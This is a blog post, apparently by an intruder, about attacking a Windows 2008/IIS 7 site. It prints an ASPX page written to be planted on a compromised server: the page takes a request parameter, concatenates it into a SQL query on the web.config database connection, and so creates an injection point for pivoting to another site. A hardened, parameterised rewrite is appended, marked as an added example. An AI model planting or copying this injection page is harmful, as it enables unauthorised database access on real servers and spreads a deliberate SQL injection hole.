Yesterday 4z1 and I looked at a site. Privilege escalation was very hard; we spent a full five hours on it with no result. Windows 2008 + IIS 7, no sa, no root, no usable services of any kind.
Along the way we used an ASPX page that constructs an injection point to pivot to another site. I found a pile of code online and not one piece of it worked.
It's not much code, so I just wrote my own. Annoying as hell.
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Configuration" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
<script language="c#" runat="server">
    void Page_Init(object sender, EventArgs e)
    {
        // connection string is read from web.config by name ("连接名" is a placeholder)
        System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
        conn.Open();
        string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1
        // the request value is concatenated straight into the SQL text ([表] and 列名 are placeholders)
        System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
        int x = command.ExecuteNonQuery(); // for a SELECT this returns -1; x is echoed anyway
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
</script>
    </div>
    </form>
</body>
</html>
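For contrast, here is an added example that is not part of the original post: the same lookup written so the request parameter can no longer change the query. The value is bound as a typed SqlParameter, the column comes from a fixed allow-list (identifiers cannot be parameterized), and the output is encoded instead of echoed raw. The table, column and connection-string names are placeholders.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<script runat="server">
    // Hardened counterpart (added example, not the original post's code).
    // Only the value is taken from the request; it is bound as a typed
    // parameter, so quotes, comments or UNION clauses in ?xxser=... are data,
    // never SQL. Identifiers cannot be parameterized, so the column name comes
    // from a fixed allow-list rather than from user input.
    static readonly string[] AllowedColumns = { "id", "user_id" }; // placeholder names

    int CountRows(string column, string rawValue)
    {
        if (Array.IndexOf(AllowedColumns, column) < 0)
            throw new ArgumentException("column not permitted");

        int value;
        if (!int.TryParse(rawValue, out value))   // reject anything that is not an integer
            throw new ArgumentException("value must be an integer");

        string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString; // placeholder name
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand(
            "select count(*) from [表] where [" + column + "] = @v", conn))   // [表] is a placeholder
        {
            cmd.Parameters.Add("@v", SqlDbType.Int).Value = value;
            conn.Open();
            return (int)cmd.ExecuteScalar();
        }
    }

    void Page_Load(object sender, EventArgs e)
    {
        try
        {
            int n = CountRows("id", Request.QueryString["xxser"]);
            Response.Write(Server.HtmlEncode(n.ToString()));   // encoded, not the raw input
        }
        catch (ArgumentException)
        {
            Response.StatusCode = 400;   // bad input: no SQL error text reaches the client
        }
    }
</script>
```

Because the error path never surfaces SQL exception text, a malformed value yields only a 400, which removes the error-based feedback the original page relied on.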